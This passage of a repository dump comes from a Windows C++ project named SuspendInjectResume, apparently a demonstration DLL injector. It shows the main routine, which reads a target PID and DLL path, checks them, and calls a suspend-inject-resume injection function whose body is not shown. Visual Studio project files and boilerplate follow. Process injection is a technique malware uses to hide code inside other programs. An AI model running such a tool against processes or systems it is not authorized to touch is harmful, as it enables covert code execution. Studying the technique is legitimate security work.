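// True for "X:\..." / "X:/..." and "\\server\share" / "\\?\..." paths.  A relative name would
// make LoadLibraryW walk the target's DLL search order, which is exactly the ambiguity an
// injector should not introduce.
static bool isAbsolutePath(PCWSTR p)
{
    wchar_t d = p[0] | 0x20;   // fold ASCII case; non-letters fail the range test below
    if (d >= L'a' && d <= L'z' && p[1] == L':' && (p[2] == L'\\' || p[2] == L'/'))
        return true;
    return p[0] == L'\\' && p[1] == L'\\';
}

// Usage: SuspendInjectResume [pid [dll-path]]
// Without arguments the PID is read from stdin and the default path below is used, as before.
// The previous signature `char* argv` was not a valid argv and the PID was read unchecked
// into a signed int.
int main(int argc, char* argv[])
{
    static wchar_t pathBuf[32767] = L"C:\\DLLTest.dll";   // static: long-path sized, keep it off the stack
    unsigned int pid = 0;

    if (argc >= 2)
    {
        char* end = NULL;
        unsigned long v = strtoul(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || v == 0)
        {
            fprintf(stderr, "Invalid PID: %s\n", argv[1]);
            return 1;
        }
        pid = (unsigned int)v;
    }
    else
    {
        puts("Inject into which PID: ");
        if (scanf_s("%u", &pid) != 1 || pid == 0)
        {
            fputs("Invalid PID.\n", stderr);
            return 1;
        }
    }

    if (argc >= 3)
    {
        if (MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS, argv[2], -1,
                                pathBuf, (int)(sizeof(pathBuf) / sizeof(pathBuf[0]))) == 0)
        {
            fprintf(stderr, "Invalid DLL path: %s\n", argv[2]);
            return 1;
        }
    }

    puts("Method used to attach thread is : SuspendInjectResume");

    if (!isAbsolutePath(pathBuf))
    {
        wprintf(L"[-] Error: DLL path must be absolute: %ls\n", pathBuf);
        return 1;
    }
    DWORD attrs = GetFileAttributesW(pathBuf);
    if (attrs == INVALID_FILE_ATTRIBUTES || (attrs & FILE_ATTRIBUTE_DIRECTORY))
    {
        wprintf(L"[-] Error: DLL not found: %ls\n", pathBuf);
        return 1;
    }

    DWORD dwProcessId = (DWORD)pid;
#ifndef _WIN64
    DWORD result = demoSuspendInjectResume(pathBuf, dwProcessId);
#else
    DWORD result = demoSuspendInjectResume64(pathBuf, dwProcessId);
#endif

    // Keep the console open like the old system("pause") did, without spawning cmd.exe.
    puts("Press Enter to exit.");
    if (argc < 2)
    {
        int c;   // drain the rest of the line left behind by scanf_s
        while ((c = getchar()) != '\n' && c != EOF) {}
    }
    (void)getchar();
    return (int)result;
}
--------------------------------------------------------------------------------
/SuspendInjectResume/SuspendInjectResume/SuspendInjectResume.vcxproj:
--------------------------------------------------------------------------------
Debug
Win32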
Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1} 24 | Win32Proj 25 | SuspendInjectResume 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | Create 159 | Create 160 | Create 161 | Create 162 | 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- /SuspendInjectResume/SuspendInjectResume/SuspendInjectResume.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | 
h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /SuspendInjectResume/SuspendInjectResume/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /SuspendInjectResume/SuspendInjectResume/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | --------------------------------------------------------------------------------